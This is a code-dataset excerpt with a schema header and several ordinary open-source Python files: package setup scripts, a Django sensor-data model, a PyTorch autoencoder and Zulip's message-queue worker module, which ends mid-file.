hexsha
stringlengths 40
40
| size
int64 1
1.03M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 3
239
| max_stars_repo_name
stringlengths 5
130
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
239
| max_issues_repo_name
stringlengths 5
130
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
239
| max_forks_repo_name
stringlengths 5
130
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 1
1.03M
| avg_line_length
float64 1
958k
| max_line_length
int64 1
1.03M
| alphanum_fraction
float64 0
1
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
4a01f354a894c03ca4bd63c92ec784123f40b42e
| 1,281
|
py
|
Python
|
setup.py
|
a115/python-dating
|
cb02fc54ea505fe3dcf34c0c055b55c328b5daf0
|
[
"MIT"
] | 1
|
2017-09-28T16:40:39.000Z
|
2017-09-28T16:40:39.000Z
|
setup.py
|
a115/python-dating
|
cb02fc54ea505fe3dcf34c0c055b55c328b5daf0
|
[
"MIT"
] | null | null | null |
setup.py
|
a115/python-dating
|
cb02fc54ea505fe3dcf34c0c055b55c328b5daf0
|
[
"MIT"
] | null | null | null |
# setup.py for the "dating" package.
# Flat packaging script: loads the long description from README.md and
# registers package metadata with setuptools at import time.
import os
from codecs import open
from setuptools import setup, find_packages
from dating import VERSION

# Directory containing this setup.py; used to locate README.md.
here = os.path.abspath(os.path.dirname(__file__))

# Default long description: the raw Markdown README.
with open(os.path.join(here, 'README.md'), encoding='utf-8') as f:
    long_description = f.read()

# Prefer a reStructuredText conversion (PyPI's historical long_description
# format) when pypandoc is installed; otherwise silently keep Markdown.
# NOTE(review): pypandoc.convert() is deprecated in newer pypandoc releases
# in favour of convert_file()/convert_text() — confirm the pinned pypandoc
# version before upgrading.
try:
    import pypandoc
    long_description = pypandoc.convert(os.path.join(here, 'README.md'), 'rst')
except (ImportError, IOError):
    pass

setup(
    name='dating',
    # Version is single-sourced from the dating package itself.
    version=VERSION,
    description='Library for handling date ranges and time periods in a business context (based on Arrow)',
    long_description=long_description,
    url='https://github.com/a115/python-dating',
    author='Jordan Dimov',
    author_email='jdimov@mlke.net',
    license='MIT',
    classifiers=[
        'Development Status :: 4 - Beta',
        'Intended Audience :: Developers',
        'Topic :: Software Development',
        'License :: OSI Approved :: MIT License',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.6',
    ],
    keywords='datetime date range ISO8601 arrow',
    packages=['dating',],
    install_requires=[
        'arrow>=0.10.0',
    ],
    python_requires='>=3'
)
| 30.5
| 111
| 0.608119
|
4a01f37932d67ce7ea8f260f5cfc3df3c94a6f4c
| 426
|
py
|
Python
|
greenhouse/web/models.py
|
wnzlff/greenhouse-web
|
b26f4c9c7c360ab1cdcb2df0b9185f31530c0215
|
[
"MIT"
] | 1
|
2021-06-28T13:26:34.000Z
|
2021-06-28T13:26:34.000Z
|
greenhouse/web/models.py
|
wnzlff/greenhouse-web
|
b26f4c9c7c360ab1cdcb2df0b9185f31530c0215
|
[
"MIT"
] | null | null | null |
greenhouse/web/models.py
|
wnzlff/greenhouse-web
|
b26f4c9c7c360ab1cdcb2df0b9185f31530c0215
|
[
"MIT"
] | null | null | null |
from django.db import models


class GreenhouseData(models.Model):
    """One periodic sensor reading from the greenhouse.

    Each row snapshots the indoor and outdoor climate together with the
    state of the light and ventilator at the time of sampling.
    """

    # Explicit surrogate primary key for each reading.
    value_id = models.AutoField(primary_key=True)
    # Set automatically when the row is first created (auto_now_add).
    timestamp = models.DateTimeField(auto_now_add=True)
    # Whether ambient light was deemed sufficient at sampling time.
    light_sufficient = models.BooleanField()
    # Whether the ventilator was running at sampling time.
    ventilator_on = models.BooleanField()
    # NOTE(review): units are not recorded in the schema — presumably
    # percent for humidity and degrees for temperature; confirm against
    # the data collector before relying on them.
    humidity_inside = models.IntegerField()
    temperature_inside = models.IntegerField()
    humidity_outside = models.IntegerField()
    temperature_outside = models.IntegerField()
| 38.727273
| 53
| 0.800469
|
4a01f39782e8e171482cbc4a49866c76b2346c36
| 1,660
|
py
|
Python
|
setup.py
|
geppi/pandaSDMX
|
33ec2704af0da5b9d1564046cd4d9707060c9bf9
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
geppi/pandaSDMX
|
33ec2704af0da5b9d1564046cd4d9707060c9bf9
|
[
"Apache-2.0"
] | null | null | null |
setup.py
|
geppi/pandaSDMX
|
33ec2704af0da5b9d1564046cd4d9707060c9bf9
|
[
"Apache-2.0"
] | null | null | null |
# setup.py for pandaSDMX — purely declarative packaging metadata.
from setuptools import find_packages, setup

# Hard runtime dependencies.
INSTALL_REQUIRES = [
    'lxml>=3.6',
    'pandas>=0.20',
    'pydantic>=1.1',
    'requests>=2.7',
    'setuptools>19',
]

# Dependencies needed only to run the test suite.
TESTS_REQUIRE = [
    'pytest>=3.3',
    'pytest-remotedata>=0.3.1',
    'requests-mock>=1.4',
]

# Optional feature sets, installable as pandaSDMX[cache] / [docs] / [tests].
EXTRAS_REQUIRE = {
    'cache': ['requests_cache'],
    'docs': ['sphinx>=1.5', 'ipython'],
    'tests': TESTS_REQUIRE,
}

setup(name='pandaSDMX',
      version='1.0.0rc1.dev0',
      description='A client for SDMX - Statistical Data and Metadata eXchange',
      author='pandaSDMX developers',
      author_email='fhaxbox66@gmail.com',
      packages=find_packages(),
      # Ship the data-source registry alongside the code.
      package_data={'pandasdmx': ['sources.json']},
      url='https://github.com/dr-leo/pandasdmx',
      python_requires='>=3.7',
      install_requires=INSTALL_REQUIRES,
      extras_require=EXTRAS_REQUIRE,
      tests_require=TESTS_REQUIRE,
      keywords='statistics SDMX pandas data economics science',
      zip_safe=True,
      provides=['pandasdmx'],
      classifiers=[
          'Intended Audience :: Developers',
          'Intended Audience :: Science/Research',
          'Intended Audience :: Financial and Insurance Industry',
          'Development Status :: 4 - Beta',
          'License :: OSI Approved :: Apache Software License',
          'Operating System :: OS Independent',
          'Programming Language :: Python',
          'Programming Language :: Python :: 3',
          'Programming Language :: Python :: 3.7',
          'Programming Language :: Python :: 3.8',
          'Topic :: Scientific/Engineering',
          'Topic :: Scientific/Engineering :: Information Analysis'
      ]
      )
| 30.740741
| 79
| 0.611446
|
4a01f5321b3800443e59f24c6e15d2c02819c77e
| 1,472
|
py
|
Python
|
net_encoder_decoder2D_plus.py
|
MuAuan/llightning-pytorch
|
38dc9ed75dd8e6f4a2a05e5a10072a549dcbf4d6
|
[
"MIT"
] | null | null | null |
net_encoder_decoder2D_plus.py
|
MuAuan/llightning-pytorch
|
38dc9ed75dd8e6f4a2a05e5a10072a549dcbf4d6
|
[
"MIT"
] | null | null | null |
net_encoder_decoder2D_plus.py
|
MuAuan/llightning-pytorch
|
38dc9ed75dd8e6f4a2a05e5a10072a549dcbf4d6
|
[
"MIT"
] | null | null | null |
import torch.nn as nn
import torch.nn.functional as F
class Encoder(nn.Module):
    """Three-stage convolutional encoder: 3 -> 64 -> 256 -> 256 channels.

    Every stage is Conv(3x3, pad 1) -> ReLU -> MaxPool(2x2) -> BatchNorm,
    halving the spatial resolution; the final feature map is flattened,
    so a (N, 3, H, W) input becomes (N, 256 * H/8 * W/8).
    """

    def __init__(self):
        super().__init__()
        # Build the stages in a loop; module order (and thus state-dict
        # layout) matches the hand-written Sequential it replaces.
        stages = []
        for c_in, c_out in ((3, 64), (64, 256), (256, 256)):
            stages += [
                nn.Conv2d(c_in, c_out, kernel_size=3, stride=1, padding=1),
                nn.ReLU(),
                nn.MaxPool2d(kernel_size=2, stride=2),
                nn.BatchNorm2d(c_out),
            ]
        stages.append(nn.Flatten())
        self.encoder = nn.Sequential(*stages)

    def forward(self, x):
        """Encode a batch of images into flat feature vectors."""
        return self.encoder(x)
class Decoder(nn.Module):
    """Transposed-convolution decoder mirroring Encoder.

    Takes the flattened 256*4*4 feature vector that Encoder produces for
    32x32 inputs and upsamples it back to a (N, 3, 32, 32) image batch
    through three stride-2 transposed convolutions (4 -> 8 -> 16 -> 32).
    """

    def __init__(self):
        super(Decoder, self).__init__()
        self.decoder = nn.Sequential(
            nn.ConvTranspose2d(256, 32, kernel_size=(2, 2), stride=(2, 2)),
            nn.ConvTranspose2d(in_channels=32, out_channels=16,
                               kernel_size=2, stride=2, padding=0),
            nn.ConvTranspose2d(in_channels=16, out_channels=3,
                               kernel_size=2, stride=2)
        )

    def forward(self, x):
        # Bug fix: the original hard-coded the batch size with
        # x.reshape(32, 256, 4, 4), which crashes for any batch other
        # than exactly 32 (e.g. the final partial batch of an epoch).
        # Inferring the batch dimension with -1 is identical for batch
        # size 32 and correct for every other size.
        x = x.reshape(-1, 256, 4, 4)
        return self.decoder(x)
| 35.047619
| 90
| 0.505435
|
4a01f534677b240bd0d9dc1fc6bc7ee1485aea9d
| 21,772
|
py
|
Python
|
zerver/worker/queue_processors.py
|
mahimg/zulip
|
73a5c392640c5c1f96f9c94f5f271d8e4d9251ad
|
[
"Apache-2.0"
] | null | null | null |
zerver/worker/queue_processors.py
|
mahimg/zulip
|
73a5c392640c5c1f96f9c94f5f271d8e4d9251ad
|
[
"Apache-2.0"
] | null | null | null |
zerver/worker/queue_processors.py
|
mahimg/zulip
|
73a5c392640c5c1f96f9c94f5f271d8e4d9251ad
|
[
"Apache-2.0"
] | null | null | null |
# Documented in https://zulip.readthedocs.io/en/latest/subsystems/queuing.html
from typing import Any, Callable, Dict, List, Mapping, Optional, cast
import signal
import sys
import os
from functools import wraps
import smtplib
import socket
from django.conf import settings
from django.db import connection
from django.core.handlers.wsgi import WSGIRequest
from django.core.handlers.base import BaseHandler
from zerver.models import \
get_client, get_system_bot, ScheduledEmail, PreregistrationUser, \
get_user_profile_by_id, Message, Realm, Service, UserMessage, UserProfile
from zerver.lib.context_managers import lockfile
from zerver.lib.error_notify import do_report_error
from zerver.lib.feedback import handle_feedback
from zerver.lib.queue import SimpleQueueClient, queue_json_publish, retry_event
from zerver.lib.timestamp import timestamp_to_datetime
from zerver.lib.notifications import handle_missedmessage_emails, enqueue_welcome_emails
from zerver.lib.push_notifications import handle_push_notification
from zerver.lib.actions import do_send_confirmation_email, \
do_update_user_activity, do_update_user_activity_interval, do_update_user_presence, \
internal_send_message, check_send_message, extract_recipients, \
render_incoming_message, do_update_embedded_data, do_mark_stream_messages_as_read
from zerver.lib.url_preview import preview as url_preview
from zerver.lib.digest import handle_digest_email
from zerver.lib.send_email import send_future_email, send_email_from_dict, \
FromAddress, EmailNotDeliveredException
from zerver.lib.email_mirror import process_message as mirror_email
from zerver.lib.streams import access_stream_by_id
from zerver.decorator import JsonableError
from zerver.tornado.socket import req_redis_key, respond_send_message
from confirmation.models import Confirmation, create_confirmation_link
from zerver.lib.db import reset_queries
from zerver.lib.redis_utils import get_redis_client
from zerver.lib.str_utils import force_str
from zerver.context_processors import common_context
from zerver.lib.outgoing_webhook import do_rest_call, get_outgoing_webhook_service_handler
from zerver.models import get_bot_services
from zulip import Client
from zerver.lib.bot_lib import EmbeddedBotHandler, get_bot_handler
import os
import sys
import ujson
from collections import defaultdict
import email
import time
import datetime
import logging
import requests
import ujson
from io import StringIO
import re
import importlib
class WorkerDeclarationException(Exception):
    """Raised when a queue worker class is declared incorrectly, e.g. a
    QueueProcessingWorker subclass without a queue_name or consume()."""
    pass
def assign_queue(queue_name, enabled=True, queue_type="consumer"):
    # type: (str, bool, str) -> Callable[[QueueProcessingWorker], QueueProcessingWorker]
    """Class decorator binding a QueueProcessingWorker subclass to a queue.

    Sets the class's queue_name attribute and, unless enabled=False,
    registers the class in the global worker registry under queue_type
    ("consumer", "loop", or "test").
    """
    def decorate(clazz):
        # type: (QueueProcessingWorker) -> QueueProcessingWorker
        clazz.queue_name = queue_name
        if enabled:
            register_worker(queue_name, clazz, queue_type)
        return clazz
    return decorate
# Global worker registries, populated at import time by @assign_queue:
# worker_classes maps queue name -> worker class; queues groups the same
# classes by queue_type.
worker_classes = {}  # type: Dict[str, Any]  # Any here should be QueueProcessingWorker type
queues = {}  # type: Dict[str, Dict[str, QueueProcessingWorker]]
def register_worker(queue_name, clazz, queue_type):
    # type: (str, QueueProcessingWorker, str) -> None
    """Record clazz in both global registries: grouped by type, then flat."""
    queues.setdefault(queue_type, {})[queue_name] = clazz
    worker_classes[queue_name] = clazz
def get_worker(queue_name):
    # type: (str) -> QueueProcessingWorker
    """Instantiate and return the worker registered for queue_name.

    Raises KeyError if no worker class was registered for that queue.
    """
    return worker_classes[queue_name]()
def get_active_worker_queues(queue_type=None):
    # type: (Optional[str]) -> List[str]
    """Return the names of all registered worker queues, optionally
    restricted to a single queue_type ("consumer", "loop", "test")."""
    registry = worker_classes if queue_type is None else queues[queue_type]
    return list(registry.keys())
def check_and_send_restart_signal():
    # type: () -> None
    """If our database connection has died, ask to be restarted.

    Workers hold long-lived DB connections; once a connection becomes
    unusable the process cannot recover on its own, so we send ourselves
    SIGUSR1 (presumably handled by the process manager as a restart
    request — confirm against the supervisor config). Any error in the
    check itself is deliberately swallowed: this is best-effort.
    """
    try:
        if not connection.is_usable():
            logging.warning("*** Sending self SIGUSR1 to trigger a restart.")
            os.kill(os.getpid(), signal.SIGUSR1)
    except Exception:
        pass
def retry_send_email_failures(func):
    # type: (Callable[[Any, Dict[str, Any]], None]) -> Callable[[QueueProcessingWorker, Dict[str, Any]], None]
    """Decorator for consume() methods that send email.

    On transient SMTP-disconnect or DNS failures, re-enqueues the event
    via retry_event() instead of letting it fall through to the generic
    error path; other exceptions propagate unchanged.
    """
    # If we don't use cast() and use QueueProcessingWorker instead of Any in
    # function type annotation then mypy complains.
    func = cast(Callable[[QueueProcessingWorker, Dict[str, Any]], None], func)

    @wraps(func)
    def wrapper(worker, data):
        # type: (QueueProcessingWorker, Dict[str, Any]) -> None
        try:
            func(worker, data)
        except (smtplib.SMTPServerDisconnected, socket.gaierror):
            # Log only when the retry machinery gives up on the event.
            def on_failure(event):
                # type: (Dict[str, Any]) -> None
                logging.exception("Event {} failed".format(event['id']))

            retry_event(worker.queue_name, data, on_failure)
    return wrapper
class QueueProcessingWorker:
    """Base class for queue consumers.

    Subclasses get queue_name set (normally via @assign_queue) and
    implement consume(); setup()/start() connect to the queue backend
    and begin consuming events one at a time.
    """
    queue_name = None  # type: str

    def __init__(self):
        # type: () -> None
        self.q = None  # type: SimpleQueueClient
        if self.queue_name is None:
            raise WorkerDeclarationException("Queue worker declared without queue_name")

    def consume(self, data):
        # type: (Dict[str, Any]) -> None
        """Process one event; must be overridden by subclasses."""
        raise WorkerDeclarationException("No consumer defined!")

    def consume_wrapper(self, data):
        # type: (Dict[str, Any]) -> None
        """Call consume(), recording failed events for later inspection.

        On any exception the event is appended (timestamp, tab, JSON) to
        <QUEUE_ERROR_DIR>/<queue_name>.errors under a lockfile, and we
        check whether a dead DB connection warrants a process restart.
        """
        try:
            self.consume(data)
        except Exception:
            self._log_problem()
            if not os.path.exists(settings.QUEUE_ERROR_DIR):
                os.mkdir(settings.QUEUE_ERROR_DIR)  # nocoverage
            fname = '%s.errors' % (self.queue_name,)
            fn = os.path.join(settings.QUEUE_ERROR_DIR, fname)
            line = u'%s\t%s\n' % (time.asctime(), ujson.dumps(data))
            lock_fn = fn + '.lock'
            with lockfile(lock_fn):
                with open(fn, 'ab') as f:
                    f.write(line.encode('utf-8'))
            check_and_send_restart_signal()
        finally:
            # Clear Django's per-request query log so it cannot grow
            # without bound in a long-lived worker process.
            reset_queries()

    def _log_problem(self):
        # type: () -> None
        logging.exception("Problem handling data on queue %s" % (self.queue_name,))

    def setup(self):
        # type: () -> None
        self.q = SimpleQueueClient()

    def start(self):
        # type: () -> None
        self.q.register_json_consumer(self.queue_name, self.consume_wrapper)
        self.q.start_consuming()

    def stop(self):
        # type: () -> None
        self.q.stop_consuming()
class LoopQueueProcessingWorker(QueueProcessingWorker):
    """Worker variant that drains its queue in batches on a polling loop
    rather than registering a per-message consumer."""
    # Seconds to sleep between drain passes; subclasses override.
    sleep_delay = 0

    def start(self) -> None:  # nocoverage
        while True:
            # TODO: Probably it'd be better to share code with consume_wrapper()
            events = self.q.drain_queue(self.queue_name, json=True)
            try:
                self.consume_batch(events)
            finally:
                # Clear Django's query log between batches (see
                # QueueProcessingWorker.consume_wrapper).
                reset_queries()
            time.sleep(self.sleep_delay)

    def consume_batch(self, event: List[Dict[str, Any]]) -> None:
        """Process one drained batch of events; subclasses must override."""
        raise NotImplementedError

    def consume(self, event: Dict[str, Any]) -> None:
        """In LoopQueueProcessingWorker, consume is used just for automated tests"""
        self.consume_batch([event])
@assign_queue('signups')
class SignupWorker(QueueProcessingWorker):
    """Handles new-account events: in production, subscribes the new
    user's email address to the Zulip MailChimp announcement list."""
    def consume(self, data):
        # type: (Dict[str, Any]) -> None
        user_profile = get_user_profile_by_id(data['user_id'])
        logging.info("Processing signup for user %s in realm %s" % (
            user_profile.email, user_profile.realm.string_id))
        if settings.MAILCHIMP_API_KEY and settings.PRODUCTION:
            # MailChimp API keys embed their datacenter after the dash;
            # that datacenter is the API hostname prefix.
            endpoint = "https://%s.api.mailchimp.com/3.0/lists/%s/members" % \
                (settings.MAILCHIMP_API_KEY.split('-')[1], settings.ZULIP_FRIENDS_LIST_ID)
            params = dict(data)
            del params['user_id']
            params['list_id'] = settings.ZULIP_FRIENDS_LIST_ID
            params['status'] = 'subscribed'
            r = requests.post(endpoint, auth=('apikey', settings.MAILCHIMP_API_KEY), json=params, timeout=10)
            if r.status_code == 400 and ujson.loads(r.text)['title'] == 'Member Exists':
                # Already on the list: log and move on, nothing to retry.
                logging.warning("Attempted to sign up already existing email to list: %s" %
                                (data['email_address'],))
            elif r.status_code == 400:
                # Other 400s may be transient; retry, raising on final failure.
                retry_event('signups', data, lambda e: r.raise_for_status())
            else:
                r.raise_for_status()
@assign_queue('invites')
class ConfirmationEmailWorker(QueueProcessingWorker):
    """Sends an invitation email and schedules a reminder two days out."""
    def consume(self, data):
        # type: (Mapping[str, Any]) -> None
        if "email" in data:
            # When upgrading from a version up through 1.7.1, there may be
            # existing items in the queue with `email` instead of `prereg_id`.
            invitee = PreregistrationUser.objects.filter(
                email__iexact=data["email"].strip()).latest("invited_at")
        else:
            invitee = PreregistrationUser.objects.filter(id=data["prereg_id"]).first()
            if invitee is None:
                # The invitation could have been revoked
                return

        referrer = get_user_profile_by_id(data["referrer_id"])
        logging.info("Sending invitation for realm %s to %s" % (referrer.realm.string_id, invitee.email))
        do_send_confirmation_email(invitee, referrer)

        # queue invitation reminder for two days from now.
        link = create_confirmation_link(invitee, referrer.realm.host, Confirmation.INVITATION)
        context = common_context(referrer)
        context.update({
            'activate_url': link,
            'referrer_name': referrer.full_name,
            'referrer_email': referrer.email,
            'referrer_realm_name': referrer.realm.name,
        })
        send_future_email(
            "zerver/emails/invitation_reminder",
            to_email=invitee.email,
            from_address=FromAddress.NOREPLY,
            context=context,
            delay=datetime.timedelta(days=2))
@assign_queue('user_activity')
class UserActivityWorker(QueueProcessingWorker):
    """Records per-(user, client, query) activity rows for usage stats."""
    def consume(self, event):
        # type: (Mapping[str, Any]) -> None
        user_profile = get_user_profile_by_id(event["user_profile_id"])
        client = get_client(event["client"])
        log_time = timestamp_to_datetime(event["time"])
        query = event["query"]
        do_update_user_activity(user_profile, client, query, log_time)
@assign_queue('user_activity_interval')
class UserActivityIntervalWorker(QueueProcessingWorker):
    """Extends the user's recorded activity intervals with a new timestamp."""
    def consume(self, event):
        # type: (Mapping[str, Any]) -> None
        user_profile = get_user_profile_by_id(event["user_profile_id"])
        log_time = timestamp_to_datetime(event["time"])
        do_update_user_activity_interval(user_profile, log_time)
@assign_queue('user_presence')
class UserPresenceWorker(QueueProcessingWorker):
    """Updates a user's presence (active/idle) state from client pings."""

    def consume(self, event):
        # type: (Mapping[str, Any]) -> None
        # Fix: the original built the string eagerly with
        # `"... %s" % (event)` — applying % directly to a Mapping is
        # fragile (mappings are special-cased by %-formatting) and the
        # formatting work is wasted whenever DEBUG logging is disabled.
        # logging's lazy argument style avoids both problems.
        logging.debug("Received presence event: %s", event)
        user_profile = get_user_profile_by_id(event["user_profile_id"])
        client = get_client(event["client"])
        log_time = timestamp_to_datetime(event["time"])
        status = event["status"]
        do_update_user_presence(user_profile, client, log_time, status)
@assign_queue('missedmessage_emails', queue_type="loop")
class MissedMessageWorker(LoopQueueProcessingWorker):
    # Aggregate all messages received every 2 minutes to let someone finish sending a batch
    # of messages
    sleep_delay = 2 * 60

    def consume_batch(self, missed_events: List[Dict[str, Any]]) -> None:
        """Group the batch by recipient so each user gets a single email."""
        by_recipient = defaultdict(list)  # type: Dict[int, List[Dict[str, Any]]]

        for event in missed_events:
            logging.debug("Received missedmessage_emails event: %s" % (event,))
            by_recipient[event['user_profile_id']].append(event)

        for user_profile_id, events in by_recipient.items():
            handle_missedmessage_emails(user_profile_id, events)
@assign_queue('missedmessage_email_senders')
class MissedMessageSendingWorker(QueueProcessingWorker):
    """Delivers missed-message emails built elsewhere; transient SMTP/DNS
    failures are re-enqueued by @retry_send_email_failures."""
    @retry_send_email_failures
    def consume(self, data):
        # type: (Dict[str, Any]) -> None
        try:
            send_email_from_dict(data)
        except EmailNotDeliveredException:
            # TODO: Do something smarter here ..
            pass
@assign_queue('missedmessage_mobile_notifications')
class PushNotificationsWorker(QueueProcessingWorker):
    """Delivers mobile push notifications for missed messages."""
    def consume(self, data):
        # type: (Mapping[str, Any]) -> None
        handle_push_notification(data['user_profile_id'], data)
# We probably could stop running this queue worker at all if ENABLE_FEEDBACK is False
@assign_queue('feedback_messages')
class FeedbackBot(QueueProcessingWorker):
    """Forwards in-app feedback messages to the feedback handler."""
    def consume(self, event):
        # type: (Mapping[str, Any]) -> None
        logging.info("Received feedback from %s" % (event["sender_email"],))
        handle_feedback(event)
@assign_queue('error_reports')
class ErrorReporter(QueueProcessingWorker):
    """Processes traceback reports, forwarding them to the error-report
    handler when error reporting is enabled in settings."""
    def consume(self, event):
        # type: (Mapping[str, Any]) -> None
        logging.info("Processing traceback with type %s for %s" % (event['type'], event.get('user_email')))
        if settings.ERROR_REPORTING:
            do_report_error(event['report']['host'], event['type'], event['report'])
@assign_queue('slow_queries', queue_type="loop")
class SlowQueryWorker(LoopQueueProcessingWorker):
    """Logs slow database queries and, when ERROR_BOT is configured,
    posts the batch to the error bot's "logs" stream."""
    # Sleep 1 minute between checking the queue
    sleep_delay = 60 * 1

    def consume_batch(self, slow_queries):
        # type: (List[Dict[str, Any]]) -> None
        for query in slow_queries:
            # Idiom fix: use logging's lazy %-args rather than eagerly
            # formatting with `"... %s" % (query)` — the original's
            # non-tuple right-hand side misbehaves if a query is ever a
            # tuple/mapping, and eager formatting is wasted work when
            # INFO logging is filtered out.
            logging.info("Slow query: %s", query)

        if settings.ERROR_BOT is None:
            return

        # Idiom fix: truthiness test instead of len(...) > 0; build the
        # report with join instead of quadratic string +=. The per-line
        # format string is unchanged.
        if slow_queries:
            topic = "%s: slow queries" % (settings.EXTERNAL_HOST,)
            content = "".join(" %s\n" % (query,) for query in slow_queries)

            error_bot_realm = get_system_bot(settings.ERROR_BOT).realm
            internal_send_message(error_bot_realm, settings.ERROR_BOT,
                                  "stream", "logs", topic, content)
@assign_queue("message_sender")
class MessageSenderWorker(QueueProcessingWorker):
    """Sends messages submitted over the Tornado socket transport.

    Each event is replayed through the full Django middleware stack as a
    synthetic POST to /json/messages; the response is published back to
    the requesting process via a Redis hash and its return queue.
    """
    def __init__(self):
        # type: () -> None
        super().__init__()
        self.redis_client = get_redis_client()
        # A standalone Django request handler lets us run the normal view
        # pipeline (middleware, auth, etc.) without a real HTTP server.
        self.handler = BaseHandler()
        self.handler.load_middleware()

    def consume(self, event):
        # type: (Mapping[str, Any]) -> None
        server_meta = event['server_meta']

        # Minimal synthetic WSGI environ; REQUEST_METHOD 'SOCKET' plus
        # 'zulip.emulated_method' marks this as a socket-originated POST.
        environ = {
            'REQUEST_METHOD': 'SOCKET',
            'SCRIPT_NAME': '',
            'PATH_INFO': '/json/messages',
            'SERVER_NAME': '127.0.0.1',
            'SERVER_PORT': 9993,
            'SERVER_PROTOCOL': 'ZULIP_SOCKET/1.0',
            'wsgi.version': (1, 0),
            'wsgi.input': StringIO(),
            'wsgi.errors': sys.stderr,
            'wsgi.multithread': False,
            'wsgi.multiprocess': True,
            'wsgi.run_once': False,
            'zulip.emulated_method': 'POST'
        }

        if 'socket_user_agent' in event['request']:
            environ['HTTP_USER_AGENT'] = event['request']['socket_user_agent']
            del event['request']['socket_user_agent']

        # We're mostly using a WSGIRequest for convenience
        environ.update(server_meta['request_environ'])
        request = WSGIRequest(environ)
        # Note: If we ever support non-POST methods, we'll need to change this.
        request._post = event['request']
        request.csrf_processing_done = True

        user_profile = get_user_profile_by_id(server_meta['user_id'])
        request._cached_user = user_profile

        resp = self.handler.get_response(request)
        server_meta['time_request_finished'] = time.time()
        server_meta['worker_log_data'] = request._log_data

        resp_content = resp.content.decode('utf-8')
        response_data = ujson.loads(resp_content)
        if response_data['result'] == 'error':
            # An error response may indicate a dead DB connection; check
            # whether this process should ask to be restarted.
            check_and_send_restart_signal()

        result = {'response': response_data, 'req_id': event['req_id'],
                  'server_meta': server_meta}

        # Publish the response where the originating process can find it:
        # a Redis hash keyed by request id, then the return queue.
        redis_key = req_redis_key(event['req_id'])
        self.redis_client.hmset(redis_key, {'status': 'complete',
                                            'response': resp_content})

        queue_json_publish(server_meta['return_queue'], result,
                           respond_send_message)
@assign_queue('digest_emails')
class DigestWorker(QueueProcessingWorker):
    # Who gets a digest is entirely determined by the enqueue_digest_emails
    # management command, not here.
    def consume(self, event):
        # type: (Mapping[str, Any]) -> None
        logging.info("Received digest event: %s" % (event,))
        handle_digest_email(event["user_profile_id"], event["cutoff"])
@assign_queue('email_mirror')
class MirrorWorker(QueueProcessingWorker):
    # NOTE: an earlier comment here ("who gets a digest ...") was
    # copy-pasted from DigestWorker and did not describe this class.
    # This worker feeds inbound emails into the email-mirror pipeline,
    # turning them into Zulip messages.
    def consume(self, event):
        # type: (Mapping[str, Any]) -> None
        message = force_str(event["message"])
        mirror_email(email.message_from_string(message),
                     rcpt_to=event["rcpt_to"], pre_checked=True)
@assign_queue('test', queue_type="test")
class TestWorker(QueueProcessingWorker):
    # This worker allows you to test the queue worker infrastructure without
    # creating significant side effects. It can be useful in development or
    # for troubleshooting prod/staging. It pulls a message off the test queue
    # and appends it to a file in /tmp.
    def consume(self, event):  # nocoverage
        # type: (Mapping[str, Any]) -> None
        fn = settings.ZULIP_WORKER_TEST_FILE
        message = ujson.dumps(event)
        logging.info("TestWorker should append this message to %s: %s" % (fn, message))
        with open(fn, 'a') as f:
            f.write(message + '\n')
@assign_queue('embed_links')
class FetchLinksEmbedData(QueueProcessingWorker):
    """Fetches URL-preview (embed) data for the links in a message, then
    re-renders the message so the previews appear inline."""
    def consume(self, event):
        # type: (Mapping[str, Any]) -> None
        # Fetching here populates the preview data that the rendering
        # step below reads.
        for url in event['urls']:
            url_preview.get_link_embed_data(url)

        message = Message.objects.get(id=event['message_id'])
        # If the message changed, we will run this task after updating the message
        # in zerver.views.messages.update_message_backend
        if message.content != event['message_content']:
            return
        if message.content is not None:
            query = UserMessage.objects.filter(
                message=message.id
            )
            message_user_ids = set(query.values_list('user_profile_id', flat=True))

            # Fetch the realm whose settings we're using for rendering
            realm = Realm.objects.get(id=event['message_realm_id'])

            # If rendering fails, the called code will raise a JsonableError.
            rendered_content = render_incoming_message(
                message,
                message.content,
                message_user_ids,
                realm)
            do_update_embedded_data(
                message.sender, message, message.content, rendered_content)
@assign_queue('outgoing_webhooks')
class OutgoingWebhookWorker(QueueProcessingWorker):
    """Delivers message events to every outgoing-webhook Service
    configured for the triggering bot user."""
    def consume(self, event):
        # type: (Mapping[str, Any]) -> None
        message = event['message']
        # The event dict is mutated per-service below; the cast drops the
        # read-only Mapping view so mypy allows the writes.
        dup_event = cast(Dict[str, Any], event)
        dup_event['command'] = message['content']

        services = get_bot_services(event['user_profile_id'])
        for service in services:
            dup_event['service_name'] = str(service.name)
            service_handler = get_outgoing_webhook_service_handler(service)
            rest_operation, request_data = service_handler.process_event(dup_event)
            do_rest_call(rest_operation, request_data, dup_event, service_handler)
@assign_queue('embedded_bots')
class EmbeddedBotWorker(QueueProcessingWorker):
    """Runs server-side (embedded) bot handlers on messages sent to them."""

    def get_bot_api_client(self, user_profile):
        # type: (UserProfile) -> EmbeddedBotHandler
        """Build the API surface handed to the embedded bot's handler."""
        return EmbeddedBotHandler(user_profile)

    def consume(self, event):
        # type: (Mapping[str, Any]) -> None
        user_profile_id = event['user_profile_id']
        user_profile = get_user_profile_by_id(user_profile_id)

        message = cast(Dict[str, Any], event['message'])

        # TODO: Do we actually want to allow multiple Services per bot user?
        services = get_bot_services(user_profile_id)
        for service in services:
            bot_handler = get_bot_handler(str(service.name))
            if bot_handler is None:
                # Misconfigured service name: log and skip rather than
                # letting one bad bot break the rest of the batch.
